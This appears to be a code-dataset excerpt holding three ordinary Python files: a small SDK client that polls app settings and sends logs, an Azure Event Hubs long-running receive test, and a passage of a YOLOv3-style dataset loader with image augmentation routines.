source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
__init__.py
|
import copy
import pickle
import threading
import requests
import logging
from typing import List
from rocketify_sdk import EventHook
from rocketify_sdk.IntervalRunner import IntervalRunner
class Sdk:
def __init__(self,
api_key: str,
polling_interval_seconds: int = 5,
debug: bool = False,
base_url: str = "https://api.rocketify.app"
):
if not api_key:
raise Exception("Please provide an api key")
self.api_key = api_key
self.polling_interval_seconds = polling_interval_seconds
self.debug = debug
self.base_url = base_url
self._config = None
self.on_config_updated = EventHook.EventHook()
self.on_action = EventHook.EventHook()
self._interval_runners: List[IntervalRunner] = []
self._stopped = False
def _raise_on_stopped(self):
if self._stopped:
raise Exception("This sdk has been stopped")
def _debug(self, msg):
if self.debug:
logging.warning(msg)
def _update_settings(self):
try:
res = requests.get("%s/apps/sdk/settings" % self.base_url, headers={"Authorization": self.api_key})
res.raise_for_status()
prev_config = self._config
new_config = res.json()
if pickle.dumps(prev_config) != pickle.dumps(new_config):
self.on_config_updated.fire(new_config)
self._config = new_config
except requests.RequestException as e:
if e.response.status_code == 403:
raise e
self._debug("Error while updating settings: %s" % str(e))
except Exception as e:
self._debug("Error while updating settings: %s" % str(e))
def _log(self, message: str, log_type: str):
try:
payload = {
"message": message,
"type": log_type,
}
res = requests.post(
"%s/apps/log" % self.base_url, headers={"Authorization": self.api_key}, json=payload)
res.raise_for_status()
except Exception as e:
self._debug("Error while sending log: %s" % str(e))
logging.warning("Could not log message", str(e))
def log(self, message: str, log_type: str = "info"):
self._raise_on_stopped()
if not message:
raise Exception("Cannot send an empty message")
if log_type not in ["error", "info", "warn", "success"]:
raise Exception("Invalid log type %s" % log_type)
if log_type == "error":
logging.error(message)
elif log_type == "warn":
logging.warning(message)
else:
logging.info(message)
self._debug("Sending log: %s %s" % (message, log_type))
thread = threading.Thread(target=self._log, name="RemoteLog", args=[message, log_type])
thread.start()
def init(self):
self._raise_on_stopped()
self._update_settings()
self._interval_runners.append(IntervalRunner(self._update_settings, self.polling_interval_seconds))
def stop(self):
self._debug("stopping")
self.on_config_updated.clear_handlers()
self.on_action.clear_handlers()
for thread in self._interval_runners:
thread.cancel()
def get_config(self):
return copy.deepcopy(self._config)
|
test_longrunning_receive.py
|
#!/usr/bin/env python
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
"""
receive test.
"""
import logging
import argparse
import time
import os
import sys
import threading
import pytest
from logging.handlers import RotatingFileHandler
from azure.eventhub import EventPosition
from azure.eventhub import EventHubClient
from azure.eventhub import EventHubSharedKeyCredential
def get_logger(filename, level=logging.INFO):
azure_logger = logging.getLogger("azure.eventhub")
azure_logger.setLevel(level)
uamqp_logger = logging.getLogger("uamqp")
uamqp_logger.setLevel(logging.INFO)
formatter = logging.Formatter('%(asctime)s %(name)-12s %(levelname)-8s %(message)s')
console_handler = logging.StreamHandler(stream=sys.stdout)
console_handler.setFormatter(formatter)
if not azure_logger.handlers:
azure_logger.addHandler(console_handler)
if not uamqp_logger.handlers:
uamqp_logger.addHandler(console_handler)
if filename:
file_handler = RotatingFileHandler(filename, maxBytes=20*1024*1024, backupCount=3)
file_handler.setFormatter(formatter)
azure_logger.addHandler(file_handler)
uamqp_logger.addHandler(file_handler)
return azure_logger
logger = get_logger("recv_test.log", logging.INFO)
def pump(receiver, duration):
total = 0
iteration = 0
deadline = time.time() + duration
with receiver:
try:
while time.time() < deadline:
batch = receiver.receive(timeout=5)
size = len(batch)
total += size
iteration += 1
if size == 0:
print("{}: No events received, queue size {}, delivered {}".format(
receiver.partition,
receiver.queue_size,
total))
elif iteration >= 5:
iteration = 0
print("{}: total received {}, last sn={}, last offset={}".format(
receiver.partition,
total,
batch[-1].sequence_number,
batch[-1].offset))
print("{}: Total received {}".format(receiver.partition, total))
except Exception as e:
print("EventHubConsumer failed: {}".format(e))
raise
@pytest.mark.liveTest
def test_long_running_receive(connection_str):
parser = argparse.ArgumentParser()
parser.add_argument("--duration", help="Duration in seconds of the test", type=int, default=30)
parser.add_argument("--consumer", help="Consumer group name", default="$default")
parser.add_argument("--partitions", help="Comma seperated partition IDs")
parser.add_argument("--offset", help="Starting offset", default="-1")
parser.add_argument("--conn-str", help="EventHub connection string", default=connection_str)
parser.add_argument("--eventhub", help="Name of EventHub")
parser.add_argument("--address", help="Address URI to the EventHub entity")
parser.add_argument("--sas-policy", help="Name of the shared access policy to authenticate with")
parser.add_argument("--sas-key", help="Shared access key")
args, _ = parser.parse_known_args()
if args.conn_str:
client = EventHubClient.from_connection_string(
args.conn_str,
event_hub_path=args.eventhub, network_tracing=False)
elif args.address:
client = EventHubClient(host=args.address,
event_hub_path=args.eventhub,
credential=EventHubSharedKeyCredential(args.sas_policy, args.sas_key),
auth_timeout=240,
network_tracing=False)
else:
try:
import pytest
pytest.skip("Must specify either '--conn-str' or '--address'")
except ImportError:
raise ValueError("Must specify either '--conn-str' or '--address'")
if args.partitions:
partitions = args.partitions.split(",")
else:
partitions = client.get_partition_ids()
threads = []
for pid in partitions:
consumer = client.create_consumer(consumer_group="$default",
partition_id=pid,
event_position=EventPosition(args.offset),
prefetch=300)
thread = threading.Thread(target=pump, args=(consumer, args.duration))
thread.start()
threads.append(thread)
for thread in threads:
thread.join()
if __name__ == '__main__':
test_long_running_receive(os.environ.get('EVENT_HUB_PERF_CONN_STR'))
|
datasets.py
|
import glob
import math
import os
import random
import shutil
import time
from pathlib import Path
from threading import Thread
import cv2
import numpy as np
import torch
from PIL import Image, ExifTags
from torch.utils.data import Dataset
from tqdm import tqdm
from .utils import xyxy2xywh, xywh2xyxy
help_url = 'https://github.com/ultralytics/yolov3/wiki/Train-Custom-Data'
img_formats = ['.bmp', '.jpg', '.jpeg', '.png', '.tif', '.dng']
vid_formats = ['.mov', '.avi', '.mp4', '.mpg', '.mpeg', '.m4v', '.wmv', '.mkv']
# Get orientation exif tag
for orientation in ExifTags.TAGS.keys():
if ExifTags.TAGS[orientation] == 'Orientation':
break
def exif_size(img):
# Returns exif-corrected PIL size
s = img.size # (width, height)
try:
rotation = dict(img._getexif().items())[orientation]
if rotation == 6: # rotation 270
s = (s[1], s[0])
elif rotation == 8: # rotation 90
s = (s[1], s[0])
except:
pass
return s
class LoadImages: # for inference
def __init__(self, path, img_size=416):
path = str(Path(path)) # os-agnostic
files = []
if os.path.isdir(path):
files = sorted(glob.glob(os.path.join(path, '*.*')))
elif os.path.isfile(path):
files = [path]
images = [x for x in files if os.path.splitext(x)[-1].lower() in img_formats]
videos = [x for x in files if os.path.splitext(x)[-1].lower() in vid_formats]
nI, nV = len(images), len(videos)
self.img_size = img_size
self.files = images + videos
self.nF = nI + nV # number of files
self.video_flag = [False] * nI + [True] * nV
self.mode = 'images'
if any(videos):
self.new_video(videos[0]) # new video
else:
self.cap = None
assert self.nF > 0, 'No images or videos found in %s. Supported formats are:\nimages: %s\nvideos: %s' % \
(path, img_formats, vid_formats)
def __iter__(self):
self.count = 0
return self
def __next__(self):
if self.count == self.nF:
raise StopIteration
path = self.files[self.count]
if self.video_flag[self.count]:
# Read video
self.mode = 'video'
ret_val, img0 = self.cap.read()
if not ret_val:
self.count += 1
self.cap.release()
if self.count == self.nF: # last video
raise StopIteration
else:
path = self.files[self.count]
self.new_video(path)
ret_val, img0 = self.cap.read()
self.frame += 1
print('video %g/%g (%g/%g) %s: ' % (self.count + 1, self.nF, self.frame, self.nframes, path), end='')
else:
# Read image
self.count += 1
img0 = cv2.imread(path) # BGR
assert img0 is not None, 'Image Not Found ' + path
print('image %g/%g %s: ' % (self.count, self.nF, path), end='')
# Padded resize
img = letterbox(img0, new_shape=self.img_size)[0]
# Convert
img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416
img = np.ascontiguousarray(img)
# cv2.imwrite(path + '.letterbox.jpg', 255 * img.transpose((1, 2, 0))[:, :, ::-1]) # save letterbox image
return path, img, img0, self.cap
def new_video(self, path):
self.frame = 0
self.cap = cv2.VideoCapture(path)
self.nframes = int(self.cap.get(cv2.CAP_PROP_FRAME_COUNT))
def __len__(self):
return self.nF # number of files
class LoadWebcam: # for inference
def __init__(self, pipe=0, img_size=416):
self.img_size = img_size
if pipe == '0':
pipe = 0 # local camera
# pipe = 'rtsp://192.168.1.64/1' # IP camera
# pipe = 'rtsp://username:password@192.168.1.64/1' # IP camera with login
# pipe = 'rtsp://170.93.143.139/rtplive/470011e600ef003a004ee33696235daa' # IP traffic camera
# pipe = 'http://wmccpinetop.axiscam.net/mjpg/video.mjpg' # IP golf camera
# https://answers.opencv.org/question/215996/changing-gstreamer-pipeline-to-opencv-in-pythonsolved/
# pipe = '"rtspsrc location="rtsp://username:password@192.168.1.64/1" latency=10 ! appsink' # GStreamer
# https://answers.opencv.org/question/200787/video-acceleration-gstremer-pipeline-in-videocapture/
# https://stackoverflow.com/questions/54095699/install-gstreamer-support-for-opencv-python-package # install help
# pipe = "rtspsrc location=rtsp://root:root@192.168.0.91:554/axis-media/media.amp?videocodec=h264&resolution=3840x2160 protocols=GST_RTSP_LOWER_TRANS_TCP ! rtph264depay ! queue ! vaapih264dec ! videoconvert ! appsink" # GStreamer
self.pipe = pipe
self.cap = cv2.VideoCapture(pipe) # video capture object
self.cap.set(cv2.CAP_PROP_BUFFERSIZE, 3) # set buffer size
def __iter__(self):
self.count = -1
return self
def __next__(self):
self.count += 1
if cv2.waitKey(1) == ord('q'): # q to quit
self.cap.release()
cv2.destroyAllWindows()
raise StopIteration
# Read frame
if self.pipe == 0: # local camera
ret_val, img0 = self.cap.read()
img0 = cv2.flip(img0, 1) # flip left-right
else: # IP camera
n = 0
while True:
n += 1
self.cap.grab()
if n % 30 == 0: # skip frames
ret_val, img0 = self.cap.retrieve()
if ret_val:
break
# Print
assert ret_val, 'Camera Error %s' % self.pipe
img_path = 'webcam.jpg'
print('webcam %g: ' % self.count, end='')
# Padded resize
img = letterbox(img0, new_shape=self.img_size)[0]
# Convert
img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416
img = np.ascontiguousarray(img)
return img_path, img, img0, None
def __len__(self):
return 0
class LoadStreams: # multiple IP or RTSP cameras
def __init__(self, sources='streams.txt', img_size=416):
self.mode = 'images'
self.img_size = img_size
if os.path.isfile(sources):
with open(sources, 'r') as f:
sources = [x.strip() for x in f.read().splitlines() if len(x.strip())]
else:
sources = [sources]
n = len(sources)
self.imgs = [None] * n
self.sources = sources
for i, s in enumerate(sources):
# Start the thread to read frames from the video stream
print('%g/%g: %s... ' % (i + 1, n, s), end='')
cap = cv2.VideoCapture(0 if s == '0' else s)
assert cap.isOpened(), 'Failed to open %s' % s
w = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH))
h = int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))
fps = cap.get(cv2.CAP_PROP_FPS) % 100
_, self.imgs[i] = cap.read() # guarantee first frame
thread = Thread(target=self.update, args=([i, cap]), daemon=True)
print(' success (%gx%g at %.2f FPS).' % (w, h, fps))
thread.start()
print('') # newline
# check for common shapes
s = np.stack([letterbox(x, new_shape=self.img_size)[0].shape for x in self.imgs], 0) # inference shapes
self.rect = np.unique(s, axis=0).shape[0] == 1 # rect inference if all shapes equal
if not self.rect:
print('WARNING: Different stream shapes detected. For optimal performance supply similarly-shaped streams.')
def update(self, index, cap):
# Read next stream frame in a daemon thread
n = 0
while cap.isOpened():
n += 1
# _, self.imgs[index] = cap.read()
cap.grab()
if n == 4: # read every 4th frame
_, self.imgs[index] = cap.retrieve()
n = 0
time.sleep(0.01) # wait time
def __iter__(self):
self.count = -1
return self
def __next__(self):
self.count += 1
img0 = self.imgs.copy()
if cv2.waitKey(1) == ord('q'): # q to quit
cv2.destroyAllWindows()
raise StopIteration
# Letterbox
img = [letterbox(x, new_shape=self.img_size, auto=self.rect)[0] for x in img0]
# Stack
img = np.stack(img, 0)
# Convert
img = img[:, :, :, ::-1].transpose(0, 3, 1, 2) # BGR to RGB, to bsx3x416x416
img = np.ascontiguousarray(img)
return self.sources, img, img0, None
def __len__(self):
return 0 # 1E12 frames = 32 streams at 30 FPS for 30 years
class LoadImagesAndLabels(Dataset): # for training/testing
def __init__(self, path, img_size=416, batch_size=16, augment=False, hyp=None, rect=False, image_weights=False,
cache_images=False, single_cls=False, pad=0.0):
try:
path = str(Path(path)) # os-agnostic
parent = str(Path(path).parent) + os.sep
if os.path.isfile(path): # file
with open(path, 'r') as f:
f = f.read().splitlines()
f = [x.replace('./', parent) if x.startswith('./') else x for x in f] # local to global path
elif os.path.isdir(path): # folder
f = glob.iglob(path + os.sep + '*.*')
else:
raise Exception('%s does not exist' % path)
self.img_files = [x.replace('/', os.sep) for x in f if os.path.splitext(x)[-1].lower() in img_formats]
except:
raise Exception('Error loading data from %s. See %s' % (path, help_url))
n = len(self.img_files)
assert n > 0, 'No images found in %s. See %s' % (path, help_url)
bi = np.floor(np.arange(n) / batch_size).astype(np.int) # batch index
nb = bi[-1] + 1 # number of batches
self.n = n # number of images
self.batch = bi # batch index of image
self.img_size = img_size
self.augment = augment
self.hyp = hyp
self.image_weights = image_weights
self.rect = False if image_weights else rect
self.mosaic = self.augment and not self.rect # load 4 images at a time into a mosaic (only during training)
# Define labels
self.label_files = [x.replace('images', 'labels').replace(os.path.splitext(x)[-1], '.txt')
for x in self.img_files]
# Read image shapes (wh)
sp = path.replace('.txt', '') + '.shapes' # shapefile path
try:
with open(sp, 'r') as f: # read existing shapefile
s = [x.split() for x in f.read().splitlines()]
assert len(s) == n, 'Shapefile out of sync'
except:
s = [exif_size(Image.open(f)) for f in tqdm(self.img_files, desc='Reading image shapes')]
np.savetxt(sp, s, fmt='%g') # overwrites existing (if any)
self.shapes = np.array(s, dtype=np.float64)
# Rectangular Training https://github.com/ultralytics/yolov3/issues/232
if self.rect:
# Sort by aspect ratio
s = self.shapes # wh
ar = s[:, 1] / s[:, 0] # aspect ratio
irect = ar.argsort()
self.img_files = [self.img_files[i] for i in irect]
self.label_files = [self.label_files[i] for i in irect]
self.shapes = s[irect] # wh
ar = ar[irect]
# Set training image shapes
shapes = [[1, 1]] * nb
for i in range(nb):
ari = ar[bi == i]
mini, maxi = ari.min(), ari.max()
if maxi < 1:
shapes[i] = [maxi, 1]
elif mini > 1:
shapes[i] = [1, 1 / mini]
self.batch_shapes = np.ceil(np.array(shapes) * img_size / 32. + pad).astype(np.int) * 32
# Cache labels
self.imgs = [None] * n
self.labels = [np.zeros((0, 5), dtype=np.float32)] * n
create_datasubset, extract_bounding_boxes, labels_loaded = False, False, False
nm, nf, ne, ns, nd = 0, 0, 0, 0, 0 # number missing, found, empty, datasubset, duplicate
np_labels_path = str(Path(self.label_files[0]).parent) + '.npy' # saved labels in *.npy file
if os.path.isfile(np_labels_path):
s = np_labels_path # print string
x = np.load(np_labels_path, allow_pickle=True)
if len(x) == n:
self.labels = x
labels_loaded = True
else:
s = path.replace('images', 'labels')
pbar = tqdm(self.label_files)
for i, file in enumerate(pbar):
if labels_loaded:
l = self.labels[i]
# np.savetxt(file, l, '%g') # save *.txt from *.npy file
else:
try:
with open(file, 'r') as f:
l = np.array([x.split() for x in f.read().splitlines()], dtype=np.float32)
except:
nm += 1 # print('missing labels for image %s' % self.img_files[i]) # file missing
continue
if l.shape[0]:
assert l.shape[1] == 5, '> 5 label columns: %s' % file
assert (l >= 0).all(), 'negative labels: %s' % file
assert (l[:, 1:] <= 1).all(), 'non-normalized or out of bounds coordinate labels: %s' % file
if np.unique(l, axis=0).shape[0] < l.shape[0]: # duplicate rows
nd += 1 # print('WARNING: duplicate rows in %s' % self.label_files[i]) # duplicate rows
if single_cls:
l[:, 0] = 0 # force dataset into single-class mode
self.labels[i] = l
nf += 1 # file found
# Create subdataset (a smaller dataset)
if create_datasubset and ns < 1E4:
if ns == 0:
create_folder(path='./datasubset')
os.makedirs('./datasubset/images')
exclude_classes = 43
if exclude_classes not in l[:, 0]:
ns += 1
# shutil.copy(src=self.img_files[i], dst='./datasubset/images/') # copy image
with open('./datasubset/images.txt', 'a') as f:
f.write(self.img_files[i] + '\n')
# Extract object detection boxes for a second stage classifier
if extract_bounding_boxes:
p = Path(self.img_files[i])
img = cv2.imread(str(p))
h, w = img.shape[:2]
for j, x in enumerate(l):
f = '%s%sclassifier%s%g_%g_%s' % (p.parent.parent, os.sep, os.sep, x[0], j, p.name)
if not os.path.exists(Path(f).parent):
os.makedirs(Path(f).parent) # make new output folder
b = x[1:] * [w, h, w, h] # box
b[2:] = b[2:].max() # rectangle to square
b[2:] = b[2:] * 1.3 + 30 # pad
b = xywh2xyxy(b.reshape(-1, 4)).ravel().astype(np.int)
b[[0, 2]] = np.clip(b[[0, 2]], 0, w) # clip boxes outside of image
b[[1, 3]] = np.clip(b[[1, 3]], 0, h)
assert cv2.imwrite(f, img[b[1]:b[3], b[0]:b[2]]), 'Failure extracting classifier boxes'
else:
ne += 1 # print('empty labels for image %s' % self.img_files[i]) # file empty
# os.system("rm '%s' '%s'" % (self.img_files[i], self.label_files[i])) # remove
pbar.desc = 'Caching labels %s (%g found, %g missing, %g empty, %g duplicate, for %g images)' % (
s, nf, nm, ne, nd, n)
assert nf > 0 or n == 20288, 'No labels found in %s. See %s' % (os.path.dirname(file) + os.sep, help_url)
if not labels_loaded and n > 1000:
print('Saving labels to %s for faster future loading' % np_labels_path)
np.save(np_labels_path, self.labels) # save for next time
# Cache images into memory for faster training (WARNING: large datasets may exceed system RAM)
if cache_images: # if training
gb = 0 # Gigabytes of cached images
pbar = tqdm(range(len(self.img_files)), desc='Caching images')
self.img_hw0, self.img_hw = [None] * n, [None] * n
for i in pbar: # max 10k images
self.imgs[i], self.img_hw0[i], self.img_hw[i] = load_image(self, i) # img, hw_original, hw_resized
gb += self.imgs[i].nbytes
pbar.desc = 'Caching images (%.1fGB)' % (gb / 1E9)
# Detect corrupted images https://medium.com/joelthchao/programmatically-detect-corrupted-image-8c1b2006c3d3
detect_corrupted_images = False
if detect_corrupted_images:
from skimage import io # conda install -c conda-forge scikit-image
for file in tqdm(self.img_files, desc='Detecting corrupted images'):
try:
_ = io.imread(file)
except:
print('Corrupted image detected: %s' % file)
def __len__(self):
return len(self.img_files)
# def __iter__(self):
# self.count = -1
# print('ran dataset iter')
# #self.shuffled_vector = np.random.permutation(self.nF) if self.augment else np.arange(self.nF)
# return self
def __getitem__(self, index):
if self.image_weights:
index = self.indices[index]
hyp = self.hyp
if self.mosaic:
# Load mosaic
img, labels = load_mosaic(self, index)
shapes = None
else:
# Load image
img, (h0, w0), (h, w) = load_image(self, index)
# Letterbox
shape = self.batch_shapes[self.batch[index]] if self.rect else self.img_size # final letterboxed shape
img, ratio, pad = letterbox(img, shape, auto=False, scaleup=self.augment)
shapes = (h0, w0), ((h / h0, w / w0), pad) # for COCO mAP rescaling
# Load labels
labels = []
x = self.labels[index]
if x.size > 0:
# Normalized xywh to pixel xyxy format
labels = x.copy()
labels[:, 1] = ratio[0] * w * (x[:, 1] - x[:, 3] / 2) + pad[0] # pad width
labels[:, 2] = ratio[1] * h * (x[:, 2] - x[:, 4] / 2) + pad[1] # pad height
labels[:, 3] = ratio[0] * w * (x[:, 1] + x[:, 3] / 2) + pad[0]
labels[:, 4] = ratio[1] * h * (x[:, 2] + x[:, 4] / 2) + pad[1]
if self.augment:
# Augment imagespace
if not self.mosaic:
img, labels = random_affine(img, labels,
degrees=hyp['degrees'],
translate=hyp['translate'],
scale=hyp['scale'],
shear=hyp['shear'])
# Augment colorspace
augment_hsv(img, hgain=hyp['hsv_h'], sgain=hyp['hsv_s'], vgain=hyp['hsv_v'])
# Apply cutouts
# if random.random() < 0.9:
# labels = cutout(img, labels)
nL = len(labels) # number of labels
if nL:
# convert xyxy to xywh
labels[:, 1:5] = xyxy2xywh(labels[:, 1:5])
# Normalize coordinates 0 - 1
labels[:, [2, 4]] /= img.shape[0] # height
labels[:, [1, 3]] /= img.shape[1] # width
if self.augment:
# random left-right flip
lr_flip = True
if lr_flip and random.random() < 0.5:
img = np.fliplr(img)
if nL:
labels[:, 1] = 1 - labels[:, 1]
# random up-down flip
ud_flip = False
if ud_flip and random.random() < 0.5:
img = np.flipud(img)
if nL:
labels[:, 2] = 1 - labels[:, 2]
labels_out = torch.zeros((nL, 6))
if nL:
labels_out[:, 1:] = torch.from_numpy(labels)
# Convert
img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416
img = np.ascontiguousarray(img)
return torch.from_numpy(img), labels_out, self.img_files[index], shapes
@staticmethod
def collate_fn(batch):
img, label, path, shapes = zip(*batch) # transposed
for i, l in enumerate(label):
l[:, 0] = i # add target image index for build_targets()
return torch.stack(img, 0), torch.cat(label, 0), path, shapes
def load_image(self, index):
# loads 1 image from dataset, returns img, original hw, resized hw
img = self.imgs[index]
if img is None: # not cached
path = self.img_files[index]
img = cv2.imread(path) # BGR
assert img is not None, 'Image Not Found ' + path
h0, w0 = img.shape[:2] # orig hw
r = self.img_size / max(h0, w0) # resize image to img_size
if r != 1: # always resize down, only resize up if training with augmentation
interp = cv2.INTER_AREA if r < 1 and not self.augment else cv2.INTER_LINEAR
img = cv2.resize(img, (int(w0 * r), int(h0 * r)), interpolation=interp)
return img, (h0, w0), img.shape[:2] # img, hw_original, hw_resized
else:
return self.imgs[index], self.img_hw0[index], self.img_hw[index] # img, hw_original, hw_resized
def augment_hsv(img, hgain=0.5, sgain=0.5, vgain=0.5):
r = np.random.uniform(-1, 1, 3) * [hgain, sgain, vgain] + 1 # random gains
hue, sat, val = cv2.split(cv2.cvtColor(img, cv2.COLOR_BGR2HSV))
dtype = img.dtype # uint8
x = np.arange(0, 256, dtype=np.int16)
lut_hue = ((x * r[0]) % 180).astype(dtype)
lut_sat = np.clip(x * r[1], 0, 255).astype(dtype)
lut_val = np.clip(x * r[2], 0, 255).astype(dtype)
img_hsv = cv2.merge((cv2.LUT(hue, lut_hue), cv2.LUT(sat, lut_sat), cv2.LUT(val, lut_val))).astype(dtype)
cv2.cvtColor(img_hsv, cv2.COLOR_HSV2BGR, dst=img) # no return needed
# Histogram equalization
# if random.random() < 0.2:
# for i in range(3):
# img[:, :, i] = cv2.equalizeHist(img[:, :, i])
def load_mosaic(self, index):
# loads images in a mosaic
labels4 = []
s = self.img_size
xc, yc = [int(random.uniform(s * 0.5, s * 1.5)) for _ in range(2)] # mosaic center x, y
indices = [index] + [random.randint(0, len(self.labels) - 1) for _ in range(3)] # 3 additional image indices
for i, index in enumerate(indices):
# Load image
img, _, (h, w) = load_image(self, index)
# place img in img4
if i == 0: # top left
img4 = np.full((s * 2, s * 2, img.shape[2]), 114, dtype=np.uint8) # base image with 4 tiles
x1a, y1a, x2a, y2a = max(xc - w, 0), max(yc - h, 0), xc, yc # xmin, ymin, xmax, ymax (large image)
x1b, y1b, x2b, y2b = w - (x2a - x1a), h - (y2a - y1a), w, h # xmin, ymin, xmax, ymax (small image)
elif i == 1: # top right
x1a, y1a, x2a, y2a = xc, max(yc - h, 0), min(xc + w, s * 2), yc
x1b, y1b, x2b, y2b = 0, h - (y2a - y1a), min(w, x2a - x1a), h
elif i == 2: # bottom left
x1a, y1a, x2a, y2a = max(xc - w, 0), yc, xc, min(s * 2, yc + h)
x1b, y1b, x2b, y2b = w - (x2a - x1a), 0, max(xc, w), min(y2a - y1a, h)
elif i == 3: # bottom right
x1a, y1a, x2a, y2a = xc, yc, min(xc + w, s * 2), min(s * 2, yc + h)
x1b, y1b, x2b, y2b = 0, 0, min(w, x2a - x1a), min(y2a - y1a, h)
img4[y1a:y2a, x1a:x2a] = img[y1b:y2b, x1b:x2b] # img4[ymin:ymax, xmin:xmax]
padw = x1a - x1b
padh = y1a - y1b
# Labels
x = self.labels[index]
labels = x.copy()
if x.size > 0: # Normalized xywh to pixel xyxy format
labels[:, 1] = w * (x[:, 1] - x[:, 3] / 2) + padw
labels[:, 2] = h * (x[:, 2] - x[:, 4] / 2) + padh
labels[:, 3] = w * (x[:, 1] + x[:, 3] / 2) + padw
labels[:, 4] = h * (x[:, 2] + x[:, 4] / 2) + padh
labels4.append(labels)
# Concat/clip labels
if len(labels4):
labels4 = np.concatenate(labels4, 0)
# np.clip(labels4[:, 1:] - s / 2, 0, s, out=labels4[:, 1:]) # use with center crop
np.clip(labels4[:, 1:], 0, 2 * s, out=labels4[:, 1:]) # use with random_affine
# Augment
# img4 = img4[s // 2: int(s * 1.5), s // 2:int(s * 1.5)] # center crop (WARNING, requires box pruning)
img4, labels4 = random_affine(img4, labels4,
degrees=self.hyp['degrees'],
translate=self.hyp['translate'],
scale=self.hyp['scale'],
shear=self.hyp['shear'],
border=-s // 2) # border to remove
return img4, labels4
def letterbox(img, new_shape=(416, 416), color=(114, 114, 114), auto=True, scaleFill=False, scaleup=True):
# Resize image to a 32-pixel-multiple rectangle https://github.com/ultralytics/yolov3/issues/232
shape = img.shape[:2] # current shape [height, width]
if isinstance(new_shape, int):
new_shape = (new_shape, new_shape)
# Scale ratio (new / old)
r = min(new_shape[0] / shape[0], new_shape[1] / shape[1])
if not scaleup: # only scale down, do not scale up (for better test mAP)
r = min(r, 1.0)
# Compute padding
ratio = r, r # width, height ratios
new_unpad = int(round(shape[1] * r)), int(round(shape[0] * r))
dw, dh = new_shape[1] - new_unpad[0], new_shape[0] - new_unpad[1] # wh padding
if auto: # minimum rectangle
dw, dh = np.mod(dw, 64), np.mod(dh, 64) # wh padding
elif scaleFill: # stretch
dw, dh = 0.0, 0.0
new_unpad = new_shape
ratio = new_shape[0] / shape[1], new_shape[1] / shape[0] # width, height ratios
dw /= 2 # divide padding into 2 sides
dh /= 2
if shape[::-1] != new_unpad: # resize
img = cv2.resize(img, new_unpad, interpolation=cv2.INTER_LINEAR)
top, bottom = int(round(dh - 0.1)), int(round(dh + 0.1))
left, right = int(round(dw - 0.1)), int(round(dw + 0.1))
img = cv2.copyMakeBorder(img, top, bottom, left, right, cv2.BORDER_CONSTANT, value=color) # add border
return img, ratio, (dw, dh)
def random_affine(img, targets=(), degrees=10, translate=.1, scale=.1, shear=10, border=0):
# torchvision.transforms.RandomAffine(degrees=(-10, 10), translate=(.1, .1), scale=(.9, 1.1), shear=(-10, 10))
# https://medium.com/uruvideo/dataset-augmentation-with-random-homographies-a8f4b44830d4
# targets = [cls, xyxy]
height = img.shape[0] + border * 2
width = img.shape[1] + border * 2
# Rotation and Scale
R = np.eye(3)
a = random.uniform(-degrees, degrees)
# a += random.choice([-180, -90, 0, 90]) # add 90deg rotations to small rotations
s = random.uniform(1 - scale, 1 + scale)
# s = 2 ** random.uniform(-scale, scale)
R[:2] = cv2.getRotationMatrix2D(angle=a, center=(img.shape[1] / 2, img.shape[0] / 2), scale=s)
# Translation
T = np.eye(3)
T[0, 2] = random.uniform(-translate, translate) * img.shape[0] + border # x translation (pixels)
T[1, 2] = random.uniform(-translate, translate) * img.shape[1] + border # y translation (pixels)
# Shear
S = np.eye(3)
S[0, 1] = math.tan(random.uniform(-shear, shear) * math.pi / 180) # x shear (deg)
S[1, 0] = math.tan(random.uniform(-shear, shear) * math.pi / 180) # y shear (deg)
# Combined rotation matrix
M = S @ T @ R # ORDER IS IMPORTANT HERE!!
if (border != 0) or (M != np.eye(3)).any(): # image changed
img = cv2.warpAffine(img, M[:2], dsize=(width, height), flags=cv2.INTER_LINEAR, borderValue=(114, 114, 114))
# Transform label coordinates
n = len(targets)
if n:
# warp points
xy = np.ones((n * 4, 3))
xy[:, :2] = targets[:, [1, 2, 3, 4, 1, 4, 3, 2]].reshape(n * 4, 2) # x1y1, x2y2, x1y2, x2y1
xy = (xy @ M.T)[:, :2].reshape(n, 8)
# create new boxes
x = xy[:, [0, 2, 4, 6]]
y = xy[:, [1, 3, 5, 7]]
xy = np.concatenate((x.min(1), y.min(1), x.max(1), y.max(1))).reshape(4, n).T
# # apply angle-based reduction of bounding boxes
# radians = a * math.pi / 180
# reduction = max(abs(math.sin(radians)), abs(math.cos(radians))) ** 0.5
# x = (xy[:, 2] + xy[:, 0]) / 2
# y = (xy[:, 3] + xy[:, 1]) / 2
# w = (xy[:, 2] - xy[:, 0]) * reduction
# h = (xy[:, 3] - xy[:, 1]) * reduction
# xy = np.concatenate((x - w / 2, y - h / 2, x + w / 2, y + h / 2)).reshape(4, n).T
# reject warped points outside of image
xy[:, [0, 2]] = xy[:, [0, 2]].clip(0, width)
xy[:, [1, 3]] = xy[:, [1, 3]].clip(0, height)
w = xy[:, 2] - xy[:, 0]
h = xy[:, 3] - xy[:, 1]
area = w * h
area0 = (targets[:, 3] - targets[:, 1]) * (targets[:, 4] - targets[:, 2])
ar = np.maximum(w / (h + 1e-16), h / (w + 1e-16)) # aspect ratio
i = (w > 4) & (h > 4) & (area / (area0 * s + 1e-16) > 0.2) & (ar < 10)
targets = targets[i]
targets[:, 1:5] = xy[i]
return img, targets
def cutout(image, labels):
# https://arxiv.org/abs/1708.04552
# https://github.com/hysts/pytorch_cutout/blob/master/dataloader.py
# https://towardsdatascience.com/when-conventional-wisdom-fails-revisiting-data-augmentation-for-self-driving-cars-4831998c5509
h, w = image.shape[:2]
def bbox_ioa(box1, box2):
# Returns the intersection over box2 area given box1, box2. box1 is 4, box2 is nx4. boxes are x1y1x2y2
box2 = box2.transpose()
# Get the coordinates of bounding boxes
b1_x1, b1_y1, b1_x2, b1_y2 = box1[0], box1[1], box1[2], box1[3]
b2_x1, b2_y1, b2_x2, b2_y2 = box2[0], box2[1], box2[2], box2[3]
# Intersection area
inter_area = (np.minimum(b1_x2, b2_x2) - np.maximum(b1_x1, b2_x1)).clip(0) * \
